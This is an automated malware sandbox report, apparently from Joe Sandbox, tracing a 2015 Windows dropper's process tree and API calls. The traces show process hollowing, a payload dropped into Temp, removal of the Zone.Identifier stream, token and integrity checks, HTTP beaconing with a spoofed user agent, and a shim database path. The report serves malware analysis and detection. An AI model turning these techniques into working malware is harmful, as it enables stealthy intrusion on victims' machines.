Imagebase:0x400000
File size:26624 bytes
MD5 hash:08CEA5CA7A6C1BCEEBE4ADC7FD9404D1

General

Start time:13:01:42
Start date:19/02/2015
Path:C:\in.exe
Wow64 process (32bit):false
Commandline:C:\in.exe
Imagebase:0x400000
File size:26624 bytes
MD5 hash:08CEA5CA7A6C1BCEEBE4ADC7FD9404D1

General

Start time:13:01:43
Start date:19/02/2015
Path:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Wow64 process (32bit):false
Commandline:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Imagebase:0x400000
File size:26624 bytes
MD5 hash:08CEA5CA7A6C1BCEEBE4ADC7FD9404D1

General

Start time:13:01:45
Start date:19/02/2015
Path:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Wow64 process (32bit):false
Commandline:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
Imagebase:0x400000
File size:26624 bytes
MD5 hash:08CEA5CA7A6C1BCEEBE4ADC7FD9404D1

General

Start time:13:02:04
Start date:19/02/2015
Path:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
Wow64 process (32bit):false
Commandline:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
Imagebase:0x400000
File size:517632 bytes
MD5 hash:7C9DB45DD4BDCD25DC21D7D91D552E32

General

Start time:13:02:22
Start date:19/02/2015
Path:C:\WINDOWS\yDDWPXuvXqBkqjT.exe
Wow64 process (32bit):false
Commandline:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
Imagebase:0x400000
File size:517632 bytes
MD5 hash:7C9DB45DD4BDCD25DC21D7D91D552E32

General

Start time:13:02:38
Start date:19/02/2015
Path:C:\WINDOWS\system32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\WINDOWS\system32\svchost -k DcomLaunch
Imagebase:0x1000000
File size:14336 bytes
MD5 hash:27C6D03BCDB8CFEB96B716F3D8BE3E18

Disassembly

Code Analysis

< >

    Executed Functions

    APIs
    • CreateProcessW.KERNEL32(C:\in.exe,00000000,00000000,00000000,00000004,00000000,00000000,00404158,0040419C), ref: 00402AFF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd
    APIs
    • NtWriteVirtualMemory.NTDLL(0000004C,7FFD6008,?,00000004), ref: 00402C77
    • NtWriteVirtualMemory.NTDLL(0000004C,00400000,003E0000,?), ref: 00402CAA
    • NtWriteVirtualMemory.NTDLL(0000004C,EntryPoint,?,?), ref: 00402D7E
    • NtSetContextThread.NTDLL(00000050,003E0068,?,00000004), ref: 00402DC2
    • FlushInstructionCache.KERNEL32(0000004C,00400000,?), ref: 00402DE8
    • ExitProcess.KERNEL32(00000000,?,00000004,7FFD5FF8), ref: 00402DFC
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 00402002
    • LoadLibraryA.KERNEL32(00000000,641C549D,21D515AE,F40F4E9E), ref: 0040233C
    • CreateThread.KERNEL32(00000000,00000000,004024B8,00404484), ref: 0040236C
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd
    APIs
    • NtWriteVirtualMemory.NTDLL(0000004C,7FFD6008,?,00000004), ref: 00402C77
    • NtWriteVirtualMemory.NTDLL(0000004C,00400000,003E0000,?), ref: 00402CAA
    • NtWriteVirtualMemory.NTDLL(0000004C,EntryPoint,?,?), ref: 00402D7E
    • NtSetContextThread.NTDLL(00000050,003E0068,?,00000004), ref: 00402DC2
    • FlushInstructionCache.KERNEL32(0000004C,00400000,?), ref: 00402DE8
    • ExitProcess.KERNEL32(00000000,?,00000004,7FFD5FF8), ref: 00402DFC
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd

    Non-executed Functions

    APIs
    • LoadIconA.USER32(?,00000011), ref: 004020E5
    • GetClientRect.USER32(?,004040F5), ref: 004020F8
    • MoveWindow.USER32(00000001,?,00000011), ref: 0040211E
    • SetFocus.USER32 ref: 00402131
    • GetClientRect.USER32(?,004040F5), ref: 00402146
    • CreateWindowExA.USER32(00000200,EDIT,00000000,503000C4,?,00000000,00000000), ref: 00402182
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006,00000000,00000000,00000001,00000000), ref: 004021B1
    • SendMessageA.USER32(00000030,00000000,00000000), ref: 004021CF
    • SendMessageA.USER32(0000000C,00000000,00000000), ref: 00402200
    • MessageBoxA.USER32(?,yexwvbncrvlnsbqugfntuhegllb,kiwciukfwgna,00000000), ref: 00402217
    • DefWindowProcA.USER32(?,00000111,?,?), ref: 0040222B
    • DeleteObject.GDI32 ref: 00402239
    • PostQuitMessage.USER32(00000000), ref: 00402241
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd
    APIs
    • RegisterClassA.USER32(004040A9), ref: 00402021
    • CreateWindowExA.USER32(00000000,bswdrvojguno vqjgmrmu,bvuxuccl jpuybdcvoaolstwdhp,00CF0000,00000090,00000080,00000100,00000100,00000000,00000000,00000000), ref: 0040205C
    • GetMessageA.USER32(004040D9,00000000,00000000,00000000), ref: 00402071
    • TranslateMessage.USER32(004040D9), ref: 00402083
    • DispatchMessageA.USER32(004040D9), ref: 0040208E
    • ExitProcess.KERNEL32 ref: 0040209C
    • LoadIconA.USER32(?,00000011), ref: 004020E5
    • GetClientRect.USER32(?,004040F5), ref: 004020F8
    • MoveWindow.USER32(00000001,?,00000011), ref: 0040211E
    • SetFocus.USER32 ref: 00402131
    • GetClientRect.USER32(?,004040F5), ref: 00402146
    • CreateWindowExA.USER32(00000200,EDIT,00000000,503000C4,?,00000000,00000000), ref: 00402182
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006,00000000,00000000,00000001,00000000), ref: 004021B1
    • SendMessageA.USER32(00000030,00000000,00000000), ref: 004021CF
    • SendMessageA.USER32(0000000C,00000000,00000000), ref: 00402200
    • MessageBoxA.USER32(?,yexwvbncrvlnsbqugfntuhegllb,kiwciukfwgna,00000000), ref: 00402217
    • DefWindowProcA.USER32(?,00000111,?,?), ref: 0040222B
    • DeleteObject.GDI32 ref: 00402239
    • PostQuitMessage.USER32(00000000), ref: 00402241
    Strings
    • bswdrvojguno vqjgmrmu, xrefs: 00402055
    • bvuxuccl jpuybdcvoaolstwdhp, xrefs: 00402050
    Memory Dump Source
    • Source File: 00000000.00000002.172717300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.172707578.00400000.00000002.sdmp
    • Associated: 00000000.00000002.172729422.00404000.00000004.sdmp
    • Associated: 00000000.00000002.172738796.00405000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_in.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNEL32(00000005,00A73C80,00001000,00000004), ref: 00401276
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401304
    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000001), ref: 00401382
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040139C
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 004013A5
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013EA
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00401413
    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00401430
    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,00000000), ref: 0040144D
    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 00401456
    • CloseHandle.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00401463
    • CreateProcessW.KERNEL32(00000043,?,00000000,00000043,00000000,00000043,00000043,?,00000000,?,?,?,00000000,?,?,?), ref: 004014A0
    • ExitProcess.KERNEL32(00000000,?,?,?,00000000), ref: 00401819
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.172514786.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_in.jbxd

    Non-executed Functions

    Executed Functions

    Non-executed Functions

    Executed Functions

    APIs
    • FindResourceA.KERNEL32(00000000,018F2041,0000000A), ref: 018F1E4D
    • SizeofResource.KERNEL32(00000000,00000000), ref: 018F1E96
    • LoadResource.KERNEL32(00000000,00000000), ref: 018F1EA1
    • LockResource.KERNEL32(00000000), ref: 018F1EAB
    • GetEnvironmentVariableA.KERNEL32(temp,?,00000104), ref: 018F1EC2
    • lstrlenA.KERNEL32(?,?,?,?,00000000), ref: 018F1ECF
    • lstrcatA.KERNEL32(?,018F56DC,?,?,?,00000000), ref: 018F1EFB
    • lstrcatA.KERNEL32(?,?,?,?,?,00000000), ref: 018F1F1B
    • lstrcatA.KERNEL32(?,.exe,?,?,?,00000000), ref: 018F1F29
    • DeleteFileA.KERNEL32(?), ref: 018F1F38
      • Part of subcall function 018F1CFA: CreateFileA.KERNEL32(018F2041,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 018F1D12
      • Part of subcall function 018F1CFA: GetProcessHeap.KERNEL32 ref: 018F1D2A
      • Part of subcall function 018F1CFA: HeapAlloc.KERNEL32(00000000,?,?,?,018F1F50,?,018F3EAD,018F2041,?,?,?,?,00000000), ref: 018F1D2D
      • Part of subcall function 018F1CFA: SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 018F1D59
      • Part of subcall function 018F1CFA: WriteFile.KERNEL32(?,00000000,?,018F1F50,00000000), ref: 018F1D6A
      • Part of subcall function 018F1CFA: GetProcessHeap.KERNEL32 ref: 018F1D75
      • Part of subcall function 018F1CFA: HeapFree.KERNEL32(00000000,?,018F1F50,?,018F3EAD,018F2041,?,?,?,?,00000000), ref: 018F1D78
      • Part of subcall function 018F1CFA: CloseHandle.KERNEL32(?), ref: 018F1D81
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 018F1F61
    • lstrcatA.KERNEL32(?,:Zone.Identifier,?,?,?,?,?,?,?,00000000), ref: 018F1F6F
    • DeleteFileA.KERNEL32(?), ref: 018F1F78
    • CreateThread.KERNEL32(00000000,00000000,j,00000000), ref: 018F1FB9
    • CloseHandle.KERNEL32(00000000), ref: 018F1FC0
    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,?), ref: 018F1FDD
    • Sleep.KERNEL32(00000FA0), ref: 018F1FE8
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetTickCount.KERNEL32 ref: 018F13FE
      • Part of subcall function 018F1385: GetModuleHandleA.KERNEL32(kernel32), ref: 018F1398
      • Part of subcall function 018F1385: GetProcAddress.KERNEL32(00000000), ref: 018F139F
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F141E
    • GetProcAddress.KERNEL32(00000000), ref: 018F1425
    • GetSystemInfo.KERNEL32(?), ref: 018F1437
    • GetVersionExA.KERNEL32(0000009C), ref: 018F1444
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetProcessHeap.KERNEL32 ref: 018F400B
    • HeapAlloc.KERNEL32(00000000,00000000,00000004,?,00000000,?,018F3FBE,?,00000004,00002907), ref: 018F402C
    • GetComputerNameA.KERNEL32(00000000,00002907), ref: 018F4047
    • GetVersionExA.KERNEL32(0000009C), ref: 018F4069
    • wsprintfA.USER32(00000004,00000075,?,?,00000000,?,018F3FBE,?,00000004,00002907), ref: 018F4107
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 018F1726
      • Part of subcall function 018F1365: GetCurrentProcess.KERNEL32 ref: 018F136F
      • Part of subcall function 018F1365: OpenProcessToken.ADVAPI32(00000000), ref: 018F1376
    • GetTokenInformation.ADVAPI32(00000000,00000002,?,00000800,?), ref: 018F174F
    • EqualSid.ADVAPI32(?,?), ref: 018F176D
    • CloseHandle.KERNEL32(00000000), ref: 018F178E
    • FreeSid.ADVAPI32(?), ref: 018F1797
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • InternetOpenA.WININET(Mazilla/5.0,00000000,00000000,00000000,00000000), ref: 018F3F39
    • InternetCloseHandle.WININET(00CC0018), ref: 018F3F56
    • GetTickCount.KERNEL32 ref: 018F3F62
    • InternetConnectA.WININET(?,00000000,00000000,00000003,00000000,00000000), ref: 018F3F97
      • Part of subcall function 018F4000: GetProcessHeap.KERNEL32 ref: 018F400B
      • Part of subcall function 018F4000: HeapAlloc.KERNEL32(00000000,00000000,00000004,?,00000000,?,018F3FBE,?,00000004,00002907), ref: 018F402C
      • Part of subcall function 018F4000: GetComputerNameA.KERNEL32(00000000,00002907), ref: 018F4047
      • Part of subcall function 018F4000: GetVersionExA.KERNEL32(0000009C), ref: 018F4069
      • Part of subcall function 018F4000: wsprintfA.USER32(00000004,00000075,?,?,00000000,?,018F3FBE,?,00000004,00002907), ref: 018F4107
    • HttpOpenRequestA.WININET(GET,?,00000000,00000000,00000000,80000000,00000000,?), ref: 018F3FD9
    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 018F3FE8
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • CreateFileA.KERNEL32(018F2041,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 018F1D12
    • GetProcessHeap.KERNEL32 ref: 018F1D2A
    • HeapAlloc.KERNEL32(00000000,?,?,?,018F1F50,?,018F3EAD,018F2041,?,?,?,?,00000000), ref: 018F1D2D
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 018F1D59
    • WriteFile.KERNEL32(?,00000000,?,018F1F50,00000000), ref: 018F1D6A
    • GetProcessHeap.KERNEL32 ref: 018F1D75
    • HeapFree.KERNEL32(00000000,?,018F1F50,?,018F3EAD,018F2041,?,?,?,?,00000000), ref: 018F1D78
    • CloseHandle.KERNEL32(?), ref: 018F1D81
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 00A200A8
    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 00A200BD
    • VirtualAlloc.KERNEL32(?,00001000,00001000,00000004), ref: 00A200D5
    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?), ref: 00A2012C
    • VirtualProtect.KERNEL32(?,00001000,00000002,?), ref: 00A20273
    • VirtualProtect.KERNEL32(?,?,00000001,?,?), ref: 00A202C3
    Memory Dump Source
    • Source File: 00000003.00000002.280031358.00A20000.00000040.sdmp, Offset: 00A20000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_a20000_Homeupd.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 018F3E4F
    • GetModuleFileNameA.KERNEL32(00000000), ref: 018F3E56
      • Part of subcall function 018F16F7: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 018F1726
      • Part of subcall function 018F16F7: GetTokenInformation.ADVAPI32(00000000,00000002,?,00000800,?), ref: 018F174F
      • Part of subcall function 018F16F7: EqualSid.ADVAPI32(?,?), ref: 018F176D
      • Part of subcall function 018F16F7: CloseHandle.KERNEL32(00000000), ref: 018F178E
      • Part of subcall function 018F16F7: FreeSid.ADVAPI32(?), ref: 018F1797
    • ExitProcess.KERNEL32(00000000), ref: 018F3E94
      • Part of subcall function 018F13C8: GetTickCount.KERNEL32 ref: 018F13FE
      • Part of subcall function 018F13C8: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F141E
      • Part of subcall function 018F13C8: GetProcAddress.KERNEL32(00000000), ref: 018F1425
      • Part of subcall function 018F13C8: GetSystemInfo.KERNEL32(?), ref: 018F1437
      • Part of subcall function 018F13C8: GetVersionExA.KERNEL32(0000009C), ref: 018F1444
      • Part of subcall function 018F15CB: GetCurrentProcess.KERNEL32 ref: 018F15D3
      • Part of subcall function 018F15CB: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 018F15E0
      • Part of subcall function 018F15CB: GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,018F3EB4), ref: 018F1600
      • Part of subcall function 018F15CB: GetLastError.KERNEL32(?,?,?,?,?,018F3EB4), ref: 018F1606
      • Part of subcall function 018F15CB: LocalAlloc.KERNEL32(00000000,018F3EB4), ref: 018F1616
      • Part of subcall function 018F15CB: GetTokenInformation.ADVAPI32(?,00000019,00000000,018F3EB4,018F3EB4), ref: 018F162F
      • Part of subcall function 018F15CB: GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,?,?,018F3EB4), ref: 018F1637
      • Part of subcall function 018F15CB: GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,?,?,018F3EB4), ref: 018F1647
      • Part of subcall function 018F15CB: LocalFree.KERNEL32(00000000), ref: 018F167D
      • Part of subcall function 018F15CB: CloseHandle.KERNEL32(?), ref: 018F1687
      • Part of subcall function 018F2005: Sleep.KERNEL32(000005DC), ref: 018F200A
      • Part of subcall function 018F36B6: Sleep.KERNEL32(00001388), ref: 018F36F9
      • Part of subcall function 018F2050: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F2099
      • Part of subcall function 018F2050: GetProcAddress.KERNEL32(00000000), ref: 018F20A0
      • Part of subcall function 018F2050: GetSystemInfo.KERNEL32(?), ref: 018F20B2
      • Part of subcall function 018F2050: GetVersionExA.KERNEL32(0000009C), ref: 018F20BF
    • Sleep.KERNEL32(00000BB8), ref: 018F3F03
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020006,018F3EA8), ref: 018F1171
    • lstrlenA.KERNEL32(?,?,?,018F12E5,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\,marker_gjru_fbegrihlgm,TRUE,00000000,018F3EA8), ref: 018F1180
    • RegSetValueExA.ADVAPI32(018F3EA8,?,00000000,00000001,?,00000000), ref: 018F119B
    • RegCloseKey.ADVAPI32(018F3EA8), ref: 018F11A6
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • EnumWindows.USER32(018F1D93,00000000), ref: 018F1E25
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd

    Non-executed Functions

    APIs
      • Part of subcall function 018F1456: GetVersionExA.KERNEL32(?), ref: 018F1484
      • Part of subcall function 018F1456: GetTokenInformation.ADVAPI32(00000000,00000012,018F1BF1,00000004,?), ref: 018F14B7
      • Part of subcall function 018F1456: CloseHandle.KERNEL32(00000000), ref: 018F14D0
      • Part of subcall function 018F15CB: GetCurrentProcess.KERNEL32 ref: 018F15D3
      • Part of subcall function 018F15CB: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 018F15E0
      • Part of subcall function 018F15CB: GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,018F3EB4), ref: 018F1600
      • Part of subcall function 018F15CB: GetLastError.KERNEL32(?,?,?,?,?,018F3EB4), ref: 018F1606
      • Part of subcall function 018F15CB: LocalAlloc.KERNEL32(00000000,018F3EB4), ref: 018F1616
      • Part of subcall function 018F15CB: GetTokenInformation.ADVAPI32(?,00000019,00000000,018F3EB4,018F3EB4), ref: 018F162F
      • Part of subcall function 018F15CB: GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,?,?,018F3EB4), ref: 018F1637
      • Part of subcall function 018F15CB: GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,?,?,018F3EB4), ref: 018F1647
      • Part of subcall function 018F15CB: LocalFree.KERNEL32(00000000), ref: 018F167D
      • Part of subcall function 018F15CB: CloseHandle.KERNEL32(?), ref: 018F1687
    • GetModuleHandleA.KERNEL32(00000000), ref: 018F1C10
    • GetModuleFileNameW.KERNEL32(00000000,?,?,00000000), ref: 018F1C17
    • lstrcatW.KERNEL32(?, /C "), ref: 018F1C58
    • lstrcatW.KERNEL32(?,?), ref: 018F1C68
    • lstrcatW.KERNEL32(?,018F56AC), ref: 018F1C76
    • CreateThread.KERNEL32(00000000,00000000,018F1BBA,00000000), ref: 018F1C9E
    • CloseHandle.KERNEL32(00000000), ref: 018F1CA5
    • ShellExecuteExW.SHELL32(0000003C), ref: 018F1CB1
    • ExitProcess.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 018F1CD3
      • Part of subcall function 018F1A83: Sleep.KERNEL32(00000064), ref: 018F1ABD
      • Part of subcall function 018F1A83: lstrcmpiA.KERNEL32(?,TRUE,?,?,?,?,?,00000000), ref: 018F1AFB
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetTempPathA.KERNEL32(00000104,018FF6B8), ref: 018F35F1
    • lstrcatA.KERNEL32(018FF6B8,\..\..\LocalLow\), ref: 018F3603
      • Part of subcall function 018F186F: lstrcpyA.KERNEL32(018F3554,018FF6B8,?,018F189F,018F3554,018FF6B8,?,?,?,018F3554,?), ref: 018F187A
      • Part of subcall function 018F186F: lstrcatA.KERNEL32(018F3554,00000000,?,018F189F,018F3554,018FF6B8,?,?,?,018F3554,?), ref: 018F1889
      • Part of subcall function 018F33C1: wvsprintfA.USER32(?,?,018F3B52), ref: 018F342D
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 018F3461
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F346A
      • Part of subcall function 018F33C1: LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 018F3477
      • Part of subcall function 018F33C1: GetProcAddress.KERNEL32(00000000), ref: 018F347A
      • Part of subcall function 018F33C1: PathGetArgsA.SHLWAPI(?), ref: 018F34A9
      • Part of subcall function 018F33C1: lstrcpynA.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F34B7
      • Part of subcall function 018F33C1: ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3509
      • Part of subcall function 018F33C1: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000104,7C834D71), ref: 018F3519
    • DeleteFileA.KERNEL32(?), ref: 018F3632
      • Part of subcall function 018F191D: GetTempPathA.KERNEL32(00000104,?), ref: 018F1950
      • Part of subcall function 018F191D: lstrcatA.KERNEL32(?,\..\..\LocalLow\), ref: 018F1962
      • Part of subcall function 018F191D: GetEnvironmentVariableA.KERNEL32(username,?,000000FF), ref: 018F1979
      • Part of subcall function 018F191D: wsprintfA.USER32(00000000,%s\cmd.%s.bat,?,?), ref: 018F1995
    • DeleteFileA.KERNEL32(?), ref: 018F3648
    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 018F3673
    • lstrcatA.KERNEL32(?,\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb), ref: 018F3685
    • DeleteFileA.KERNEL32(?), ref: 018F368E
      • Part of subcall function 018F11B1: LoadLibraryA.KERNEL32(advapi32.dll), ref: 018F11C8
